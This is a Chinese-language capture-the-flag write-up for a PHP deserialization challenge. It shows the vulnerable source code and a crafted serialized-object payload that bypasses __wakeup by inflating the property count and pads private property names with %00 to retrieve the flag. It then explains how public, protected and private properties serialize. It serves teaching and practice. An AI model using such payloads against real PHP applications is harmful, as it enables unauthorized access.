[极客大挑战 2019]PHP1
知识点:PHP序列化与反序列化,最下方有几个扩展可以看一下
他说备份了,就肯定扫目录,把源文件备份扫出来
dirsearch扫目录扫到www.zip压缩包
aaarticlea/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==" alt="点击并拖拽以移动">
然后解压发现是,序列化。
具体特征如下:
index.php包含如下代码:接收参数,进行序列化
<?php
include 'class.php';
$select = $_GET['select'];
$res=unserialize(@$select);
?>
aaarticlea/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==" alt="点击并拖拽以移动">
class.php含: 源码都放在着
<?php
include 'flag.php';
error_reporting(0);
class Name{
private $username = 'nonono';
private $password = 'yesyes';
public function __construct($username,$password){
$this->username = $username;
$this->password = $password;
}
function __wakeup(){
$this->username = 'guest';
}
function __destruct(){
if ($this->password != 100) {
echo "</br>NO!!!hacker!!!</br>";
echo "You name is: ";
echo $this->username;echo "</br>";
echo "You password is: ";
echo $this->password;echo "</br>";
die();
}
if ($this->username === 'admin') {
global $flag;
echo $flag;
}else{
echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
die();
}
}
}
?>
aaarticlea/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==" alt="点击并拖拽以移动">
开始构造
声明一个Name类,包含username,password,且两个变量都是private修饰,整句话都有用。
然后根据判断句得知,username必须是admin,password必须是100所以,构造序列化
O是对象,s是字符串,i是数字
因为是private修饰的所以要加%00充当空格
构造:O:4:"Name":2:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}
payload:url+?select=O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}
aaarticlea/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==" alt="点击并拖拽以移动">
下面是拓展+答疑:
我看大佬的payload的时候,很疑惑为什么要写%00Name%00username这样的形式?
然后我进行了三种修饰方式的测试:public,protected,private
我忽然明白:
只有public修饰的不用太多的修饰原生态构造就好,而private需要加%00Name%00,
protected则需要使用 %00*%00username这样的方式
protected修饰变量,运行后回显代码内注释内容
<?php
class Name{
protected $username = 'nonono';////////////////看这两行
protected $password = 'yesyes';
public function __construct($username,$password){
$this->username = $username;
$this->password = $password;
}
}
$a = new Name('admin',100);
$b=serialize($a);
echo $b;
//看这看这看这看这!!!!!!!!!
//运行会输出 O:4:"Name":2:{s:11:" * username";s:5:"admin";s:11:" * password";i:100;}
?>
aaarticlea/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==" alt="点击并拖拽以移动">
public修饰变量,运行后回显代码内注释内容
<?php
class Name{
public $username = 'nonono';
public $password = 'yesyes';
public function __construct($username,$password){
$this->username = $username;
$this->password = $password;
}
}
$a = new Name('admin',100);
$b=serialize($a);
echo $b;
//O:4:"Name":2:{s:8:"username";s:5:"admin";s:8:"password";i:100;}
?>
aaarticlea/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==" alt="点击并拖拽以移动">
private修饰变量,运行后回显代码内注释内容
<?php
class Name{
private $username = 'nonono';
private $password = 'yesyes';
public function __construct($username,$password){
$this->username = $username;
$this->password = $password;
}
}
$a = new Name('admin',100);
$b=serialize($a);
echo $b;
//O:4:"Name":2:{s:14:" Name username";s:5:"admin";s:14:" Name password";i:100;}
?>
aaarticlea/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==" alt="点击并拖拽以移动">
最新文章
- 超全面的.NET GDI+图形图像编程教程
- ubuntu14.0安装arm-linux-gcc交叉编译环境
- Andriod 字符串数组里加入字符串元素
- UVa 1648 (推公式) Business Center
- Flask与Ajax
- HTTP学习笔记7-消息报头
- js中()()问题
- zTree市县实现三个梯级DAO接口测试
- USACO 3.4 American Heritage
- Python学习笔记——基础篇2【第三周】——计数器、有序字典、元组、单(双)向队列、深浅拷贝、函数、装饰器
- C# 对xml进行操作
- C#之基础
- linux tar 压缩解压命令
- java序列化浅谈
- Java项目案例:酒店前台客服管理系统
- 我的第一个python web开发框架(31)——定制ORM(七)
- jackson json转对象 对象转json
- LeetCode(67):二进制求和
- Mac 删除/卸载 自己安装的python
- Spring security实现国际化问题